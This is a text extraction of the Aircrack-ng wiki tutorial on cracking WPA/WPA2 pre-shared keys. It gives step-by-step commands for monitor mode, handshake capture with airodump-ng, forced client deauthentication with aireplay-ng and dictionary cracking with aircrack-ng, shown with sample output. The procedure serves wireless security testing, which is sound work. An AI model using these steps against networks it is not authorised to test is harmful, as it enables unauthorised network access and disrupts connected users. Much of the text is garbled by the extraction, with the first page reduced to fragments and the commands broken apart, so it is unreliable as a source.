You are on page 1of 8

15.02.

12

cracking_ pa [Aircrack-ng]

Tutorial: Ho
V B : : 1.20 M A

to Crack WPA/WPA2

07, 2010

I
T WPA/WPA2
[ [ :// :// . . . / . /

.

T
/ / / /

WPA/WPA2 WPA/WPA2 WPA 9_ / . . ].
9_ / 9_ _EN.

. T W W -F T
[ :// -

. I
. ]

S

PDF

WEP,

WPA . T

WPA2 WPA P , '

]

C

E .

. . ONLY PSK,

WPA/WPA2 . S T WPA/WPA2 , IV . T -

WPA/WPA2 . U WEP . A 8 63 , . WEP, ,

WEP. T , . T , . S . C WPA/WPA2 . B 63 , , , ,

WPA/WPA2. T AP. H , ,

T 50 ,
[ :// . / . ]

300 . I , . Y WPA WPA2 . , . T

CPU. I . .

IMPORTANT T WPA/WPA2. I T . S I . I . I . P . , A -

[

://

.

-

.

/

/T

]

. A

A
F , Y Y . T . Y . Y 0.9.1 .
.aircrack-ng.org/doku.php?id=cracking_ pa 1/8

: . U . . R AP . S AP AP . I

In the examples below.Start the wireless interface in monitor mode The purpose of this step is to put your card into what is called monitor mode. and it won't work with v0. Here are the basic steps we will be going through: 1. Solution Solution Overview The objective is to capture the WPA/WPA2 authentication handshake and then use aircrack-ng to crack the preshared key. you will need to change ath0 to the interface name which is specific to your wireless card. Then just change the values in the examples below to the specific network. it will allow us to optionally deauthenticate a wireless client in a later step. By hearing every packet. so it is using an ieee80211 driver . we can later capture the WPA/WPA2 4-way handshake. otherwise the advice that follows will not work. run the following command: a i r m o n n g On a machine with a Ralink. The advantage of passive is that you don't actually need injection capability and thus the Windows version of aircrack-ng can be used.see the generic instructions for setting it up.9. Passively means you simply wait for a wireless client to authenticate to the WPA/WPA2 network. the Ralink shows neither of these indicators. here is what was used: MAC address of PC running aircrack-ng suite: 00:0F:B5:88:AC:82 MAC address of the wireless client using WPA2: 00:0F:B5:FD:FB:C2 BSSID (MAC address of access point): 00:14:6C:7E:40:80 ESSID (Wireless network name): teddy Access point channel: 9 Wireless interface: ath0 You should gather the equivalent information for the network you will be working on. an Atheros and a Broadcom wireless card installed. Start airodump-ng on AP channel with filter for bssid to collect authentication handshake 3. Normally your card will only hear packets addressed to you.Setting up madwifi-ng . To determine the driver (and the correct procedure to follow).org/doku. Actively means you will accelerate the process by deauthenticating an existing wireless client. Run aircrack-ng to crack the pre-shared key using the authentication handshake Step 1 . so the Broadcom card is using a mac80211 driver. Monitor mode is the mode whereby your card can listen to every packet in the air.12 cracking_ pa [Aircrack-ng] Ensure all of the above assumptions are true.aircrack-ng. Start the wireless interface in monitor mode on the specific AP channel 2. The exact procedure for enabling monitor mode varies depending on the driver you are using.php?id=cracking_ pa 2/8 .02. Step 1a . Finally. Note that mac80211 is supported onl since aircrack-ng v1.0-rc1. Equipment used In this tutorial. As well. Use aireplay-ng to deauthenticate the wireless client 4.follow the madwifi-ngspecific steps to set up the Atheros card.1. the system responds: I n t e r f a c e r a u s b 0 w l a n 0 w i f i 0 a t h 0 C h i p s e t R a l i n kR T 7 3 B r o a d c o m A t h e r o s A t h e r o s D r i v e r r t 7 3 b 4 3-[ p h0 ] m a d w i f i n g m a d w i f i n gV A P( p a r e n t :w i f i 0 ) The presence of a [phy0] tag at the end of the driver name is an indicator for mac80211.15. Both entries of the Atheros card show madwifi-ng as the driver . This can be done either actively or passively.

This is because the madwifi-ng Die a di f i -g a di f i -gV A P(ae : i f i 0 )( i d eea be d ) You will notice that ath0 is reported above as being put into monitor mode. then stop each one. To match the frequency to the channel. . 4 5 2G H A c c e Pi :0 0 : 0 F : B 5 : 8 8 : A C : 8 2 B i R ae : 0 b / TP e: 1 8d B S e iii = 0 / 3 R e :f f R T S h:f f Fa ge h:f f Ec i e:f f P e M aa g ee :f f L i Qai = 0 / 9 4 S i ga ee= 9 5d B Nie ee= 9 5d B R i ai d i d : 0 R i ai dc : 0 R i ai dfa g : 0 T ec e ie e i e: 0 I ai d ic : 0 M i e db e a c : 0 In the response above. The system will respond: I ef a c e i f i 0 ah 0 C h i e Ah e Ah e wifi0 instead of our wireless interface of ath0 . It should look similar to this: iee eh 0 i f i 0 iee iee e e i e e i e e i .php?id=cracking_ pa 3/8 . run iwconfig to ensure there are none left.org/doku.12 cracking_ pa [Aircrack-ng] First stop ath0 by entering: a i -g ah 0 The system responds: I ef a c e i f i 0 ah 0 C h i e Ah e Ah e Die a di f i -g a di f i -gV A P(ae : i f i 0 )( V A Pd e e d ) Enter iwconfig to ensure there are no other athX interfaces. .html#wp134132] .cisco. When you are finished. To confirm the interface is properly setup.15.com/en/US/docs/wireless/technology/channel/deployment/guide/Channel. Only the madwifi-ng drivers show the card MAC address in the AP field. I E E E8 0 2 . you can see that ath0 is in monitor mode. other drivers do not.02.Setting up mac80211 drivers Unlike madwifi-ng.com/en/US/docs/wireless/technology/channel/deployment/guide/Channel. enter the following command to start the wireless card on channel 9 in monitor mode: a i -g a i f i 09 Note: In this command we use drivers are being used. If there are any remaining athX interfaces. Step 1b . The system will respond: iee i f i 0 eh 0 ah 0 iee iee e e i e e i e e i .aircrack-ng.452GHz frequency which is channel 9 and the Access Point shows the MAC address of your wireless card. . on the 2. Now. check out: http://www. So everything is good. otherwise the following steps will not work properly.html#wp134132 [http://www. Instead. 1 1 g E S S I D : " " N i c ae : " " Md e : M i Fe ec: 2 . enter iwconfig . This will give you the frequency for each channel. use the following command to set up your card in monitor mode on channel 9: . .cisco. you do not need to remove the wlan0 interface when setting up mac80211 drivers. It is important to confirm all this information prior to proceeding.

Start airodump-ng to collect authentication handshake The purpose of this step is to run airodump-ng to capture the 4-way authentication handshake for the AP we are interested in.org/doku. 1 1 b g Md e : M i Fe ec: 2 . 4 5 2G H A c c e Pi :N A c i ae d TP e= 0d B R e i ii: 7 R T S h:f f Fa ge h= 2 3 5 2B Ec i e:f f P e M aa g ee :f f L i Qai : 0 S i ga ee: 0 Nie ee: 0 R i ai d i d : 0 R i ai dc : 0 R i ai dfa g : 0 T ec e ie e i e: 0 I ai d ic : 0 M i e db e a c : 0 I E E E8 0 2 .Setting up other drivers For other (ieee80211-based) drivers. Wlan0 is still in regular (managed) mode. Step 1c . Because both interfaces share a common radio. To confirm successful setup. So. the correct interface name to use in later parts of the tutorial is mon0. Step 2 . and you are not performing any channel-hopping. Enter: a i d -gc9b i d0 0 : 1 4 : 6 C : 7 E : 4 0 : 8 0ah 0 Where: -c 9 is the channel for the wireless network . The following output should appear: iee eh 0 a e0 a0 iee iee e e i e e i e e i .aircrack-ng. . on channel 9 (2. simply run the following command to enable monitor mode (replace rausb0 with your interface name): a i -g a a b 09 The system responds: I ef a c e a b 0 C h i e R ai Die 7 3( i d eea be d ) At this point.this is normal. 1 1 b g E S S I D : " " Md e : M aa g e d Fe ec: 2 . Also notice that wlan0 is still present.15. . and in managed mode .02. 4 5 2G H TP e= 0d B R e i ii: 7 R T S h:f f Fa ge h= 2 3 5 2B Ec i e:f f P e M aa g ee :f f L i Qai : 0 S i ga ee: 0 Nie ee: 0 R i ai d i d : 0 R i ai dc : 0 R i ai dfa g : 0 T ec e ie e i e: 0 I ai d ic : 0 M i e db e a c : 0 0 Here. I E E E8 0 2 . and can be used as usual. mon0 is seen as being in monitor mode. run iwconfig . the monitor interface has no Access Point field at all. Unlike madwifi-ng.452GHz). the interface should be ready to use.changing the channel on one interface also changes channel on the other one.12 a i -g a a09 cracking_ pa [Aircrack-ng] The system responds: I ef a c e a0 C h i e B a d c Die b 4 3-[h0 ] ( i d eea be d 0 ) Notice that airmon-ng enabled monitor-mode 0. provided that the AP that wlan0 is connected to is on the same channel as the AP you are attacking. they must always be tuned to the same channel .php?id=cracking_ pa 4/8 .

you can backtrack and perform this step. The other constraint is that there must be a wireless client currently associated with the AP. This means a four-way handshake was successfully captured.Use aireplay-ng to deauthenticate the wireless client This step is optional.# / s C H M B E N C C I P H E RA U T HE S S I D 1 1 6 1 4 9 5 4 W P A 2C C M P P S K t e d d P W R L o s t P a c k e t s P r o b e s 3 5 0 1 1 6 0 0 : 1 4 : 6 C : 7 E : 4 0 : 8 0 0 0 : 0 F : B 5 : F D : F B : C 2 In the screen above. This displays only eapol packets you are interested in.12 cracking_ pa [Aircrack-ng] --bssid 00:14:6C:7E:40:80 is the access point MAC address. If there is no wireless client currently associated with the AP. Important: Do NOT use the --ivs option. You only perform this step if you opted to actively speed up the process. Here what it looks like if a wireless client is connected to the network: C H 9] [E l a p s e d :4s] [2 0 0 7 0 3 2 41 6 : 5 8] [W P Ah a n d s h a k e :0 0 : 1 4 : 6 C : 7 E : 4 0 : 8 0 B S S I D 0 0 : 1 4 : 6 C : 7 E : 4 0 : 8 0 B S S I D P W RR X Q B e a c o n s 3 91 0 0 S T A T I O N 5 1 # D a t a . you can wait until airodump-ng captures a handshake when one or more clients connect to the AP. you determine a client which is currently connected.aircrack-ng. Based on the output of airodump-ng in the previous step. then you have to be patient and wait for one to connect to the AP so that a handshake can be captured. If you are patient.# / s C H M B E N C C I P H E RA U T HE S S I D 0 0 9 5 4 W P A 2C C M P P S K t e d d P W R L o s t P a c k e t s P r o b e s Troubleshooting Tip See the Troubleshooting Tips section below for ideas. This means airodump-ng has successfully captured the four-way handshake. See just above for an example screenshot. Watch the airodump-ng screen for WPA handshake: 00:14:6C:7E:40:80 in the top right-hand corner.15. The wireless client will then hopefully reauthenticate with the AP. This step sends a message to the wireless client saying that that it is no longer associated with the AP. notice the WPA handshake: 00:14:6C:7E:40:80 in the top right-hand corner. You need the MAC address for the following.3 or 4 eapol packets. Here it is with no connected wireless clients: C H 9] [E l a p s e d :4s] [2 0 0 7 0 3 2 41 7 : 5 1 B S S I D 0 0 : 1 4 : 6 C : 7 E : 4 0 : 8 0 B S S I D P W RR X Q B e a c o n s 3 91 0 0 S T A T I O N 5 1 # D a t a .2. Open another console session and enter: a i r e p l an g01a0 0 : 1 4 : 6 C : 7 E : 4 0 : 8 0c0 0 : 0 F : B 5 : F D : F B : C 2a t h 0 Where: -0 means deauthentication 1 is the number of deauths to send (you can send multiple if you wish) -a 00:14:6C:7E:40:80 is the MAC address of the access point -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing ath0 is the interface name Here is what the output looks like: . The reauthentication is what generates the 4-way authentication handshake we are interested in collecting. Use Wireshark and apply a filter of eapol . This is what we use to break the WPA/WPA2 pre-shared key. Needless to say. ath0 is the interface name.php?id=cracking_ pa 5/8 . Thus you can see if capture contains 0. Step 3 . To see if you captured any handshake packets.02.org/doku. -w psk is the file name prefix for the file which will contain the IVs. if a wireless client shows up later and airodump-ng did not capture the handshake.1. You must capture the full packets. This eliminates extraneous traffic. there are two ways.

lst . 8 [ 0 0 : 0 0 : 0 0 ]2k est e s t e d( 3 7 . Here is what successfully cracking the pre-shared key looks like: A i r c r a c k n g0 . # B S S I D E S S I D E n c rp t i o n W P A( 1h a n d s h a k e ) 1 0 0 : 1 4 : 6 C : 7 E : 4 0 : 8 0 t e d d C h o o s i n gf i r s tn e t w o r ka st a r g e t . Troubleshooting Tips The deauthentication packets are sent directly from your PC to the clients. even days. When this happens you either have to redo step 3 (deauthenticating the wireless client) or wait longer if you are using the passive approach. c a p O p e n i n gp s k 0 3 . l s tb0 0 : 1 4 : 6 C : 7 E : 4 0 : 8 0p s k * . Step 4 . 2 0k / s ) . You can use John the Ripper [http://www. c a p O p e n i n gp s k 0 4 .php?id=cracking_ pa 6/8 .aircrack-ng. Here is typical output when handshakes are found: O p e n i n gp s k 0 1 . c a p Where: -w password. c a p O p e n i n gp s k 0 4 .com/john/] (JTR) to generate your own list and pipe them into aircrack-ng.Run aircrack-ng to crack the pre-shared key The purpose of this step is to actually crack the WPA/WPA2 pre-shared key. If you did not get an ACK packet back. Open another console session and enter: a i r c r a c k n gwp a s s w o r d . use tcpdump or similar to look for ACK packets back from the client. aircrack-ng takes each word and tests to see if this is in fact the pre-shared key. So you must be physically close enough to the clients for your wireless card transmissions to reach them.password. Now at this point. c a p O p e n i n gp s k 0 2 .15.lst is the name of the dictionary file. To confirm the client received the deauthentication packets.cap is name of group of files containing the captured packets. This file can be found in the test directory of the aircrack-ng source code. Using JTR in conjunction with aircrack-ng is beyond the scope of this tutorial.02. *. this could take a long time. Remember to specify the full path if the file is not located in the same directory. then the client did not hear the deauthentication packet. N ov a l i dW P Ah a n d s h a k e sf o u n d . Here is typical output when there are no handshakes found: O p e n i n gp s k 0 1 . c a p O p e n i n gp s k 0 2 . Depending on the speed of your CPU and the size of the dictionary. Basically. you have to wait until a wireless client authenticates to the AP. There is a small dictionary that comes with aircrack-ng . Notice in this case that we used the wildcard * to include multiple files. you need a dictionary of words as input. c a p R e a d1 8 2 7p a c k e t s .12 1 1 : 0 9 : 2 8 S e n d i n gD e A u t ht os t a t i o n cracking_ pa [Aircrack-ng] -S T M A C :[ 0 0 : 0 F : B 5 : 3 4 : 3 0 : 3 0 ] With luck this causes the client to reauthenticate and yield the 4-way handshake.org/doku. When using the passive approach.openwall. The Wiki FAQ has an extensive list of dictionary sources. c a p O p e n i n gp s k 0 3 . c a p R e a d1 8 2 7p a c k e t s . aircrack-ng will start attempting to crack the pre-shared key. To do this.

for example. Also.12 cracking_ pa [Aircrack-ng] K E YF O U N D ![1 2 3 4 5 6 7 8] M a s t e rK e :C D6 90 D1 18 EA CA AC 5C 5E CB B5 98 57 D4 93 E B 8A 61 3C 54 A7 28 23 8E DC 37 E2 C5 95 EA BF D T r a n s c i e n tK e :0 6F 8B BF 3B 15 5A EE E1 F6 6A E5 11 FF 81 29 8 C E8 A9 DA 0F CE DA 6D E7 08 4B A9 08 37 EC D4 0 F F1 D4 1E 16 51 79 30 E6 43 2B F2 55 0D 54 A5 E 2 B2 09 08 CE A3 21 5A 62 66 29 32 76 66 6E 07 1 E A P O LH M A C :4 E2 7D 95 B0 09 15 35 78 89 C6 6C 8B 12 9D 1C B Troubleshooting Tips I Cannot Capture the Four-way Handshake! It can sometimes be tricky to capture the four-way handshake. Such as missing AP packets. Normally this is a single deauth packet. Be sure there are no connection managers running on your system. IE auto. Be sure that your capture card is locked to the same channel as the AP. Make sure you are not running any other program/process that could interfere such as connection managers. The point is. For information. use tcpdump or similar to look for ACK packets back from the client. not broadcast. Unfortunately. etc. 54MB. 36. if you don't get it the first time. 24.15. Make sure to use the drivers specified on the wiki. 54Mbit are 'g'. have patience and experiment a bit. Ideally. missing client packets.5 and 11Mbit are 'b'. Some drivers allow you to specify the mode. In an ideal world. 11MB. Here are some troubleshooting tips to address this: Your monitor card must be in the same mode as the both the client and Access Point. 9. then the client did not hear the deauthentication packet. the filter eapol will quickly display only the EAPOL packets. 1MB. if your card was in B mode and the client/AP were using G mode. always use the driver versions specified on the wiki. sometimes you need to experiment a bit to get your card to properly capture the four-way handshake. Sometimes you also need to set the monitor-mode card to the same speed. The WPA Packet Capture Explained tutorial is a companion to this tutorial and walks you through what a normal WPA connection looks like.org/doku. 2. use directed deauths. You are physically close enough to receive both access point and wireless client packets. etc. Try stopping the radio on the client station then restarting it. some old versions do not capture all packets. 5. Kismet. So.aircrack-ng.02. 6. This is because some drivers such as the RTL8187L driver do not capture packets the card itself sends. When using Wireshark. connect and disconnect a wireless client normally to generate the handshake. Based on what EAPOL packets . Depending on the driver. if you are too close then the received packets can be corrupted and discarded. then you would not capture the handshake. Do man iwconfig to see the options for modulation . iwconfig has an option modulation that can sometimes be used. Review your captured data using the WPA Packet Capture Explained tutorial to see if you can identify the problem. Also. This is because some older versions of the drivers such as the RT73 driver did not capture client packets. 1. etc. you should use a wireless device dedicated to capturing the packets. The wireless card strength is typically less then the AP strength. send the absolute minimum of packets to cause the client to reauthenticate. If you use the deauth technique. see the FAQ for detailed information on how to use Wireshark. As well. It can be done! Another approach is to use Wireshark to review and analyze your packet capture. This is especially important for new APs and clients which may be turbo mode and/or other new standards. You can do this by specifying -c <channel of AP> when you start airodump-ng. As well. 48. 12. To confirm the client received the deauthentication packets. If you did not get an ACK packet back. This can change channels and/or change mode without your knowledge. This can sometimes give you clues as to what is wrong and thus some ideas on how to correct it. 2MB. Conversely. 18.php?id=cracking_ pa 7/8 . Sending an excessive number of deauth packets may cause the client to fail to reconnect and thus it will not generate the four-way handshake. So you cannot be too close.

txt L as t modified: 2 0 1 0 /0 8 /2 9 1 9 :4 4 by mis ter_x Except where otherwise noted. Every packet sent by client or AP must be acknowledged. This is an area which requires effort to build your skills on both WPA/WPA2 plus how to use Wireshark. not just IVs.02. content on this wiki is licensed under the following license:CC AttributionNoncommercial-Share Alike 3. This is done with an “acknowledgment” packet which has a destination MAC of the device which sent the original packet. I have touched on some techniques and areas to look at.12 cracking_ pa [Aircrack-ng] are actually in the capture. When it comes to analyzing packet captures. This confirms the client received the deauth packet. Failure to receive the “ack” packet likely means that the client is out of transmission range. Needless to say.aircrack-ng. it is impossible to provide detailed instructions. To dig deep into the packet analysis.0 Unported [http://creativecommons.org/doku. aircrack-ng says "No valid WPA handshakes found" Check the “I Cannot Capture the Four-way Handshake!” troubleshooting tip. The reason for eliminating the BSSID filter is to ensure all packets including acknowledgments are captured.0/] . if you are missing the client packets then try to determine why and how to collect client packets. you must start airodump-ng without a BSSID filter and specify the capture of the full packet.org/licenses/by-nc-sa/3. aircrack-ng says "0 handshakes" Check the “I Cannot Capture the Four-way Handshake!” troubleshooting tip.15. determine your correction plan. one thing to check is that you receive the “ack” packet. If you are trying to deauthenticate a client. Thus failure. certain packets are dropped from the capture.php?id=cracking_ pa 8/8 . it must be locked to the AP channel. For example. With a BSSID filter. c rac king_wpa.